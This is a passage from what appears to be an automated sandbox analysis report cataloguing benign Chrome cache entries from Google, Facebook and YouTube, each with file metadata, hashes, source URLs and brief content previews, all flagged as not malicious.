                                                                                                                                                                                  URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.J6zlSvuPGsg.es5.O/ck=boq-identity.AccountsSignInUi.y688-Pa0BpE.L.B1.O/am=P2CJlmMBEISZlnP-nnFyGAAAAAAAAAAArAHs/d=1/exm=LEikZe,_b,_tp,byfTOb,lsjVmc/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlHublJNG6l_TtY5gqKGP1QzXq7-qQ/ee=ASJRFf:LANRae;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:yt7X5e;EmZ2Bf:zr1jrb;Erl4fe:FloWmf;JsbNhc:Xd8iUd;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Oj465e:KG2eXe;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;UpnZUd:nnwwYc;XdiAjb:NLiXbe;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;eBAeSb:zbML3c;iFQyKf:vfuNJf;io8t5d:yDVVkb;kMFpHd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:fqEYIb;qddgKe:xQtZb;sP4Vbe:VwDzFe;uY49fb:COQbmf;ul9GGd:VDovNc;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=n73qwf,SCuOPb,IZT63,vfuNJf,UUJqVe,ws9Tlc,siKnQd,STuCOe,njlZCf,fJpY1b,b3kMqb,EGw7Od,ZUKRxc,my67ye,t2srLd,EN3i8d,hmHrle,mWLH9d,NOeYWe,O6y8ed,fqEYIb,PrPYRd,MpJwZc,hc6Ubd,Rkm0ef,KUM7Z,oLggrd,inNHtf,L1AAkb,lwddkf,SpsfSb,fFzhe,tUnxGc,aW3pY,EFQ78c,xQtZb,I6YDgd,zbML3c,zr1jrb,vHEMJe,YHI3We,YTxL4,bSspM,Uas9Hd,zy0vNb,K0PMbc,AvtSve,qmdT9,xBaz7b,eVCnO,LDQI"
                                                                                                                                                                                  Preview:"use strict";_F_installCss(".O0WRkf{-webkit-user-select:none;transition:background .2s .1s;border:0;border-radius:3px;cursor:pointer;display:inline-block;font-size:14px;font-weight:500;min-width:4em;outline:none;overflow:hidden;position:relative;text-align:center;text-transform:uppercase;-webkit-tap-highlight-color:transparent;z-index:0}.A9jyad{font-size:13px;line-height:16px}.zZhnYe{transition:box-shadow .28s cubic-bezier(0.4,0,0.2,1);background:#dfdfdf;box-shadow:0px 2px 2px 0px rgba(0,0,0,.14),0px 3px 1px -2px rgba(0,0,0,.12),0px 1px 5px 0px rgba(0,0,0,.2)}.zZhnYe.qs41qe{transition:box-shadow .28s cubic-bezier(0.4,0,0.2,1);transition:background .8s;box-shadow:0px 8px 10px 1px rgba(0,0,0,.14),0px 3px 14px 2px rgba(0,0,0,.12),0px 5px 5px -3px rgba(0,0,0,.2)}.e3Duub,.e3Duub a,.e3Duub a:hover,.e3Duub a:link,.e3Duub a:visited{background:#4285f4;color:#fff}.HQ8yf,.HQ8yf a{color:#4285f4}.UxubU,.UxubU a{color:#fff}.ZFr60d{position:absolute;top:0;right:0;bottom:0;left:0;background-color:tran

                                                                                                                                                                                  Chrome Cache Entry: 808

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1143)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):4272
                                                                                                                                                                                  Entropy (8bit):5.407649241930215
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:bVcC0LhyRs71268NYZOAx/rfuNfnAZe5PwGNHW:B3qhpRByNPx54GN2
                                                                                                                                                                                  MD5:B427175FA1078775EB792756E7B6D1E7
                                                                                                                                                                                  SHA1:4C55C0233D3D9002B3449C025F97821F8BB8900D
                                                                                                                                                                                  SHA-256:EE147E859AD0F09AA50367974E38AB53E7C7054C4A51D400A7F45B0EB251454F
                                                                                                                                                                                  SHA-512:AF8D384188363378BC99C2E51523E74E1D18BA77D51BFF7647A377A117499421F9E94477E09907925E46DAD0A908B799A616D0B4855FFFF064BA6350815063D3
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://www.gstatic.com/cv/js/sender/v1/cast_sender.js
                                                                                                                                                                                  Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.'use strict';var l=function(){var a=h,b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},m=this||self,n=/^[\w+/_-]+[=]{0,2}$/,p=null,q=function(a){return(a=a.querySelector&&a.querySelector("script[nonce]"))&&(a=a.nonce||a.getAttribute("nonce"))&&n.test(a)?a:""},r=function(a,b){function e(){}e.prototype=b.prototype;a.i=b.prototype;a.prototype=new e;a.prototype.constructor=a;a.h=function(c,g,k){for(var f=Array(arguments.length-2),d=2;d<arguments.length;d++)f[d-2]=arguments[d];.return b.prototype[g].apply(c,f)}},t=function(a){return a};function u(a){if(Error.captureStackTrace)Error.captureStackTrace(this,u);else{var b=Error().stack;b&&(this.stack=b)}a&&(this.message=String(a))}r(u,Error);u.prototype.name="CustomError";var v=function(a,b){a=a.split("%s");for(var e="",c=a.length-1,g=0;g<c;g++)e+=a[g]+(g<b.length?b[g]:"%s");u.call(this,e+a[c])};r(v,u);v.prototype.name="Asse

                                                                                                                                                                                  Chrome Cache Entry: 809

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 21700, version 1.0
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):21700
                                                                                                                                                                                  Entropy (8bit):7.989666631701204
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:PxbG/ZciREUTWlMwbptJm5f9/1HuLZ4r38bxSpfGL/+SHA+ilQlO3fq8O/4s:5bfiBWlRPm5fjrruYJGTiqlO3fo/p
                                                                                                                                                                                  MD5:7D75A9EB3B38B5DD04B8A7CE4F1B87CC
                                                                                                                                                                                  SHA1:68F598C84936C9720C5FFD6685294F5C94000DFF
                                                                                                                                                                                  SHA-256:6C24799E77B963B00401713A1DBD9CBA3A00249B9363E2C194D01B13B8CDB3D7
                                                                                                                                                                                  SHA-512:CF0488C34A1AF36B1BB854DEA2DECFC8394F47831B1670CAB3EED8291B61188484CC8AB0A726A524ECDD20B71D291BCCCBC2CE999FD91662ACA63D2D22ED0D9F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://fonts.gstatic.com/s/googlesans/v14/4UabrENHsxJlGDuGo1OIlLU94YtzCwY.woff2
                                                                                                                                                                                  Preview:wOF2......T...........T_..........................4..*....`..~..d..u.....,..$.....6.$..|. ..V..K..^.=...sp.f.m../....l\.....T.9.n..A...........2x.{P[V..v%..M...f.7..+c.cM.'...$..u.H4[?i.'..T..+.(...L...inV.@.dd....T.. }b...c.ghRA..I$.su.....`....Q.OB..S.{.#.3..o.{v.........n...]f#b.J_.......}# ..1... F........=?O.|._p........X.6.VQ.*.E..rU...}....dK.$...0.W..2i..Y...9.Y.............f{..6'....C:%.(........}.....W..._....k...|.........Y8./..e..........L......_.9..v...2F..$..y)....UWu_..T.]qE.H.b..OP...B@.4.!,F..._............z.3.*.A,h.M.(...6~_[U$.....uM2.*..qz.v.........hV\|?.......M-.h..by.A,.}.....?...52.g.,....<..s..k....h.U.]1.1..O......m......j...}6.j.v.a..R....Fj...).fO3........GSM....... ...GL..({A....$O..&'..\....:.x....{N.p8..q..iF..k...b.>....<..M..`.....d.I.5... .x...mo.L.?A(..F }./.._V.e.A.Z3.....C...h...f......(,..3....%.h'.?sG..&x..W.......b].'34.S#s...wiG.O....J.ADDDDBw.m;.....K.ti).....?.6.\.M..d.....[.z....4..D.b...6..F.....F..D.r

                                                                                                                                                                                  Chrome Cache Entry: 810

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (19354)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):1222477
                                                                                                                                                                                  Entropy (8bit):5.4643266472857155
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6144:5AL9fLzt98Nb0yfV4Ttflp53hQeODbAOAEJHGXlbyC5Z7gZ5dnXnNfM7clj75YDg:yRxyfEt9XS/DpJmXhyCT7anXnNpV4MG0
                                                                                                                                                                                  MD5:1FD6F086EC8B78436EC1463B780D9F47
                                                                                                                                                                                  SHA1:30F0B9E8A51E57F84FAA9A01EEED96A3C57C5E75
                                                                                                                                                                                  SHA-256:2C96233A239E7071BCAC25C4285D2DF1DFA30AC9F1E6A7CF6CA37832B85E78C3
                                                                                                                                                                                  SHA-512:E53E3A8AEC8106BEC73FD4BE97D1CD7FB4A10C503852E8B744F62FF93FBB3A71B58F20CFA9DED7F177AF8CF558A9D6C3E45240041EC8FD5E59FC43EBE103CB42
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3iwSC4/yd/l/en_US/YZaBrTjfx7q.js?_nc_x=Ij3Wp8lg5Kz
                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("CometStyleXDarkTheme",[],(function(a,b,c,d,e,f){e.exports={"fds-black":"black","fds-black-alpha-05":"rgba(0, 0, 0, 0.05)","fds-black-alpha-10":"rgba(0, 0, 0, 0.1)","fds-black-alpha-15":"rgba(0, 0, 0, 0.15)","fds-black-alpha-20":"rgba(0, 0, 0, 0.2)","fds-black-alpha-30":"rgba(0, 0, 0, 0.3)","fds-black-alpha-40":"rgba(0, 0, 0, 0.4)","fds-black-alpha-50":"rgba(0, 0, 0, 0.5)","fds-black-alpha-60":"rgba(0, 0, 0, 0.6)","fds-black-alpha-80":"rgba(0, 0, 0, 0.8)","fds-blue-05":"black","fds-blue-30":"black","fds-blue-40":"black","fds-blue-60":"black","fds-blue-70":"black","fds-blue-80":"black","fds-button-text":"black","fds-comment-background":"black","fds-dark-mode-gray-35":"black","fds-dark-mode-gray-50":"black","fds-dark-mode-gray-70":"black","fds-dark-mode-gray-80":"black","fds-dark-mode-gray-90":"black","fds-dark-mode-gray-100":"black","fds-gray-00":"black","fds-gray-05":"black","fds-gray-10":"black","fds-gray-20":"black","fds-gray-25":"black","fds-gray-30":"black","

                                                                                                                                                                                  Chrome Cache Entry: 814

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):42
                                                                                                                                                                                  Entropy (8bit):2.9881439641616536
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                  MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                  SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                  SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                  SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://www.google.com/pagead/lvz?evtid=ACd6Ktx7AgHfp1KsmF-SUCZc1BEmJJSYB9lNU9D-gV-GVVV4-7LsfykiArPkjwqVH-K9RPjxOFUrUsVJAMf4CJjksbbnzTaVng&req_ts=1708515003&pg=MainAppBootstrap%3AHome&az=1&sigh=AB9vU42dObu9dfQUKrPY3nGEziziiPCuAQ
                                                                                                                                                                                  Preview:GIF89a.............!.......,...........D.;

                                                                                                                                                                                  Chrome Cache Entry: 816

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 540x960, components 3
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):85190
                                                                                                                                                                                  Entropy (8bit):7.98453689846693
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:gVN1sAT/Eu/zfneNT3XSChXOKbkZXR1dzoUrPf7tByY+BfIzwzkwln:sbBedpRyfpb7tB5MfIzwR
                                                                                                                                                                                  MD5:BA0886465CE86B1F6BC73EDAF0CB0751
                                                                                                                                                                                  SHA1:E1738813E3325E55C77AA9136E2787BD1359BEB1
                                                                                                                                                                                  SHA-256:4511C1993F47C7903D6138FDD20F9F2516F8869BE9723A5111B79F01F0F3E28D
                                                                                                                                                                                  SHA-512:9AAD4A897F38FE7BD865E61CD8EA75079F05B0B9D07C5DB8275558E8305C44FA8576E8401BD352A21CA1E472BD17111CBA1318DDA71A939F547E75D94DDD86F8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://scontent-lga3-2.xx.fbcdn.net/v/t15.5256-10/426078014_332034236501415_4239489258418623458_n.jpg?stp=dst-jpg_s960x960&_nc_cat=1&ccb=1-7&_nc_sid=1a7029&_nc_ohc=VfZdJG-WIEMAX9wjlVf&_nc_ht=scontent-lga3-2.xx&oh=00_AfDplOqKwXsw7NbDMma3G9jQiD-xFCbNXN_-HRfMmos7Aw&oe=65DB0A5A
                                                                                                                                                                                  Preview:......JFIF..............Photoshop 3.0.8BIM.......h..(.bFBMD0a000a700100006a1e00001d500000d4520000df560000dd8500002ccd00005ed30000d7d700007fdd0000c64c0100....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((..........."...............................................................................km9.k..R@J..Sz....F....a.1..D.y...........,L.:Ai%+-....H.#..6O,..i.w.z&.....$...&...v.!..... .D.2.$cY.q:HX1.g.ax..0Y#.....$..f.!.b.f.kM.D2.D..T..Qx...3..=nh.M...../6V}tp..X...8..1...f...&2..)#,.Hd.&i.w...8@9MP.1......P].`6.... Ad. ..M5g.A.q..7..n.C.N.H.........MfU-.X....Y.....m;.jN.HP..8.Y..i..E.&.G.e.L...cD.Wh..*....^.....e..Gn.s...^..X.....Z.l.&q3V.A...qg.[.7Fd...jgVh.. .....M..j..9.8.."..Xz1s&.........`.s8.bf% bAN<.B..=?'Xy..i...d.:IRx.JM.%..#F<...q..Yfq...MR...g9f.z...\`.`fKu.JfP.S.<.I.#..x.H..S!&.!..NHqH..a&2..=@Hyu....2.f@_....F..!.Y.8N.(.[.ZM.T....-..S.Z..3.YD_...0.......$.

                                                                                                                                                                                  Chrome Cache Entry: 818

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (537)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):120225
                                                                                                                                                                                  Entropy (8bit):5.488640897900843
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:il2OQARzpdKV4zqPPL8B4HkwmAZfHiBJPuKeCM0hdiK:q2OQA1pdKVGqb8B4HkwmAZfHiBJPuKek
                                                                                                                                                                                  MD5:3F55585BE7F5A50662D88DD7DA7A7E26
                                                                                                                                                                                  SHA1:C6920CCFC829D4E7F3E0F5B151A5EE69228200D9
                                                                                                                                                                                  SHA-256:B40C94F7D6D8CADA4666C5D047768D0C4899E81405A9F4F03061FC5FC612B1BD
                                                                                                                                                                                  SHA-512:D0123EA57BE17FE9D209CF1B8AC65CCB4523D237B3897BE48F0739F3BF1C8B5FAFE9D07BC9F7CE88E3A87C752A02EF8106E4F952FB9F170BD38079756D47D96E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://www.youtube.com/s/player/5683fc5e/player_ias.vflset/en_US/remote.js
                                                                                                                                                                                  Preview:(function(g){var window=this;'use strict';var a8=function(a){g.Ho(a,"zx",Math.floor(2147483648*Math.random()).toString(36)+Math.abs(Math.floor(2147483648*Math.random())^g.ob()).toString(36));return a},b8=function(a,b,c){Array.isArray(c)||(c=[String(c)]);.g.Iga(a.B,b,c)},Uyb=function(a){if(a instanceof g.jt)return a;.if("function"==typeof a.Jk)return a.Jk(!1);if(g.bb(a)){var b=0,c=new g.jt;c.next=function(){for(;;){if(b>=a.length)return g.K2;if(b in a)return g.kt(a[b++]);b++}};.return c}throw Error("Not implemented");},Vyb=function(a,b,c){if(g.bb(a))g.bc(a,b,c);.else for(a=Uyb(a);;){var d=a.next();if(d.done)break;b.call(c,d.value,void 0,a)}},Wyb=function(a,b){var c=[];.Vyb(b,function(d){try{var e=g.Cv.prototype.B.call(this,d,!0)}catch(f){if("Storage: Invalid value was encountered"==f)return;throw f;}void 0===e?c.push(d):g.yla(e)&&c.push(d)},a);.return c},Xyb=function(a,b){Wyb(a,b).forEach(function(c){g.Cv.prototype.remove.call(this,c)},a)},Yyb=function(a){if(a.ma){if(a.ma.locationOverri

                                                                                                                                                                                  Chrome Cache Entry: 823

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (3367)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):30293
                                                                                                                                                                                  Entropy (8bit):5.535489582127669
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:Tsez1EDy+Pbe0dmjHyc+Rs23g/+FBT3KTOcI5zrSZ6r4R8:o5S0EjF1Car8
                                                                                                                                                                                  MD5:291AEC083026B4A69933345E4A8EC700
                                                                                                                                                                                  SHA1:B82293A123F627C42136E47E0FDDCACC9BD33FD4
                                                                                                                                                                                  SHA-256:BC761CE6529E5AC4321A1B78FC1F457EF74C692980CEF5642BD8A0B762031D07
                                                                                                                                                                                  SHA-512:0E24548F53D28F90046C2CA705649363DBB1E4BB3563EB05A1045E9AF904A1FFD939E531918B337A39C54EBF59A47BA26C5EBBDF670D4F88B86696100AA15A91
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3iMz64/y-/l/en_US/cvkeasQlp8Ct426Vxq3HF6.js?_nc_x=Ij3Wp8lg5Kz
                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("FBReelsRootWithEntrypointQuery_facebookRelayOperation",[],(function(a,b,c,d,e,f){e.exports="7090801701039075"}),null);.__d("FBReelsRootWithEntrypointQuery$Parameters",["FBReelsRootWithEntrypointQuery_facebookRelayOperation"],(function(a,b,c,d,e,f){"use strict";a={kind:"PreloadableConcreteRequest",params:{id:b("FBReelsRootWithEntrypointQuery_facebookRelayOperation"),metadata:{},name:"FBReelsRootWithEntrypointQuery",operationKind:"query",text:null}};e.exports=a}),null);.__d("CometTahoeSidepaneDialog.react",["ix","CometCircleButton.react","TetraText.react","fbicon","react"],(function(a,b,c,d,e,f,g,h){"use strict";var i,j=i||d("react"),k=32;b=16;var l=k+2*b,m=16;function a(a){var b=a.bodyAspectRatio,e=a.children,f=a.onClose;a=a.title;b=b!=null?j.jsx("div",{className:"x78zum5 xl56j7k x6ikm8r x10wlt62",children:j.jsx("div",{style:{paddingTop:"min("+100/b+"%, 100vh - var(--header-height) - "+l+"px - "+m+"px)",position:"relative",width:"min(100%, (100vh - var(--header-h

                                                                                                                                                                                  Chrome Cache Entry: 825

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (3274)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):455907
                                                                                                                                                                                  Entropy (8bit):5.427285669194909
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:i7gniZbz80T44cQr9yTkXsOMlZITy+AEJO5M4PLCHkShkCrfa3/1UGRA32i:iph9yTkXNMITyRbuHfa+hz
                                                                                                                                                                                  MD5:015964316668CD1CA40BAFD103698653
                                                                                                                                                                                  SHA1:6DCE60ECD33AC7597D92F89D4475F60C3C874474
                                                                                                                                                                                  SHA-256:A3472973C524271725C5309287B5B97814944D2F0D36EA2A61C25D432DDA1D0A
                                                                                                                                                                                  SHA-512:9E6A388E69565C4900C9091F19275E51B65B71BDFA4E495E944087FEEEA28C050A531E4BA06C0050F8B8F873BA51D6474267D43D8468EAB93F35E764A4BA1F63
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3i74t4/yw/l/en_US/MfB2RTJ-W7s.js?_nc_x=Ij3Wp8lg5Kz
                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("CometSetDenseModeMutation_facebookRelayOperation",[],(function(a,b,c,d,e,f){e.exports="4486145264820781"}),null);.__d("CometSetDenseModeMutation.graphql",["CometSetDenseModeMutation_facebookRelayOperation"],(function(a,b,c,d,e,f){"use strict";a=function(){var a=[{defaultValue:null,kind:"LocalArgument",name:"input"}],c=[{alias:null,args:[{kind:"Variable",name:"input",variableName:"input"}],concreteType:"SetDenseModeResponsePayload",kind:"LinkedField",name:"set_dense_mode",plural:!1,selections:[{alias:null,args:null,concreteType:"Viewer",kind:"LinkedField",name:"viewer",plural:!1,selections:[{alias:null,args:null,kind:"ScalarField",name:"dense_mode_setting",storageKey:null}],storageKey:null}],storageKey:null}];return{fragment:{argumentDefinitions:a,kind:"Fragment",metadata:null,name:"CometSetDenseModeMutation",selections:c,type:"Mutation",abstractKey:null},kind:"Request",operation:{argumentDefinitions:a,kind:"Operation",name:"CometSetDenseModeMutation",selections:

                                                                                                                                                                                  Chrome Cache Entry: 831

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (3537)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):52603
                                                                                                                                                                                  Entropy (8bit):5.316331138717284
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:yYrF+dXpn0e+99D7FPUzHhbtjFnmFRbdwWRI32nB7PXAlnuhPisfq3ECoe5EzpGS:yYrF+d5n0e+99DJPUzHhbtjFnmFRbdwM
                                                                                                                                                                                  MD5:F0A9F2F65F95B61810777606051EE17D
                                                                                                                                                                                  SHA1:872BF131CB4BEFD0242339F072F2F9B9FBF8019F
                                                                                                                                                                                  SHA-256:9CDF2602AC04F7E2BED582D4299C73D464FC4AB069E3AD5A20EE2B6635A015B8
                                                                                                                                                                                  SHA-512:6823914507BA31E0F61B95CC53F09543C3C14E5530E9EF1B00338FBBD7C25D2E398F5F628DF4ED25D6FF88E0F8BEE506EFE62BA704778BA7CFF09AEC9579D9F0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://www.gstatic.com/eureka/clank/117/cast_sender.js
                                                                                                                                                                                  Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.'use strict';var f,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},h="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ba=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},ca=ba(this),da=function(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&h(c,a,{configurable:!0,writable:!0,value:b})}};.da("Symbol",function(a){if(a)return a;var b=function(g,k){this.g=g;h(this,"description",{configurable:!0,writable:!0,value:k})};b.prototype.toStri

                                                                                                                                                                                  Chrome Cache Entry: 832

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines (540), with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):540
                                                                                                                                                                                  Entropy (8bit):5.0953958403229755
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:TMHd2yqNZNNUrS7n4nuL0EGuSl6FGYdB2GSuh43JPYa0:2d2PNdUrS7nfcuSQ8YdqXya0
                                                                                                                                                                                  MD5:AABAC4B67E56DCAAA0C06DCEA2C8C7EC
                                                                                                                                                                                  SHA1:4AEC6ABB0BCB8B6828F0CFE62637D3B270FDEA6C
                                                                                                                                                                                  SHA-256:96D0C3380F81C5C429B2FAB04F6A9961F83287D1922A1B44A1DBD4A4004D62B6
                                                                                                                                                                                  SHA-512:C9709D6C0A2EE21148E5D8826A3093E3A353B7D2BA0C135924EA8079982A8475F71B5926AFE6F21FF67C2538574D2F6EC0C20C97ED836F6A67799EA05D20AC6D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://www.youtube.com/opensearch?locale=en_US
                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8"?><OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/"><ShortName>YouTube</ShortName><Description>Search for videos on YouTube</Description><Tags>youtube video</Tags><Image height="16" width="16" type="image/vnd.microsoft.icon">https://www.youtube.com/favicon.ico</Image><Url type="text/html" template="https://www.youtube.com/results?search_query={searchTerms}&amp;page={startPage?}&amp;utm_source=opensearch"></Url><Query role="example" searchTerms="cat"></Query></OpenSearchDescription>

                                                                                                                                                                                  Chrome Cache Entry: 833

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (612)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):5996
                                                                                                                                                                                  Entropy (8bit):5.333832123538773
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:3b+xu6Xvi9MjDJH4b00/Ehufm1sZSurumwgk2CzuIHYfVEAxzjtMK9NATIub:32fKzdugSLLF+tRQ
                                                                                                                                                                                  MD5:EC72A757ABBA28CB1DDDCDE8928BF192
                                                                                                                                                                                  SHA1:D2C8B9B60BBCF074386A139075E5D087FF07CCCB
                                                                                                                                                                                  SHA-256:C8F987C5B2238BBDCE06D97560CCC5E9069EE4766DF9C95C084708BD002E6999
                                                                                                                                                                                  SHA-512:2A7BC3B9817DAFEF2F2127AD13FEFCEDBFB4697D21B5089C74E481DC63342DB73C69054A033F9D98F6374D9BF976E65F4AB799FC8E6C134C7B85AAEC3D098262
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://www.youtube.com/s/player/5683fc5e/player_ias.vflset/en_US/miniplayer.js
                                                                                                                                                                                  Preview:(function(g){var window=this;'use strict';var Zsb=function(a,b){g.V.call(this,{I:"button",La:["ytp-miniplayer-expand-watch-page-button","ytp-button","ytp-miniplayer-button-top-left"],Y:{title:"{{title}}","data-tooltip-target-id":"ytp-miniplayer-expand-watch-page-button","aria-keyshortcuts":"i","data-title-no-tooltip":"{{data-title-no-tooltip}}"},V:[{I:"svg",Y:{height:"24px",version:"1.1",viewBox:"0 0 24 24",width:"24px"},V:[{I:"g",Y:{fill:"none","fill-rule":"evenodd",stroke:"none","stroke-width":"1"},V:[{I:"g",Y:{transform:"translate(12.000000, 12.000000) scale(-1, 1) translate(-12.000000, -12.000000) "},.V:[{I:"path",Y:{d:"M19,19 L5,19 L5,5 L12,5 L12,3 L5,3 C3.89,3 3,3.9 3,5 L3,19 C3,20.1 3.89,21 5,21 L19,21 C20.1,21 21,20.1 21,19 L21,12 L19,12 L19,19 Z M14,3 L14,5 L17.59,5 L7.76,14.83 L9.17,16.24 L19,6.41 L19,10 L21,10 L21,3 L14,3 Z",fill:"#fff","fill-rule":"nonzero"}}]}]}]}]});this.J=a;this.Ta("click",this.onClick,this);this.updateValue("title",g.rU(a,"Expand","i"));this.update({"da

                                                                                                                                                                                  Chrome Cache Entry: 834

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JPEG image data, baseline, precision 8, 480x854, components 3
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):49043
                                                                                                                                                                                  Entropy (8bit):7.97565661137414
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:57qH6ZYBCbXFbg45E8XUzDrqVj9hFkO+gCzdvZXcmExOD2Jd0haJXC0iCUbnIKwY:sHIYBCbXRHhkXrQhFX+gCRxXtPHXCIMu
                                                                                                                                                                                  MD5:642ED1A655122CDAB6773B41C26D79AB
                                                                                                                                                                                  SHA1:01DFE9828B29F0FC6190D83C5BC6C443FFCE2469
                                                                                                                                                                                  SHA-256:6B7FBAE5217801CD79AB9D76390AFF44A0E9092F58A94D8D9AA0D5BED53E675D
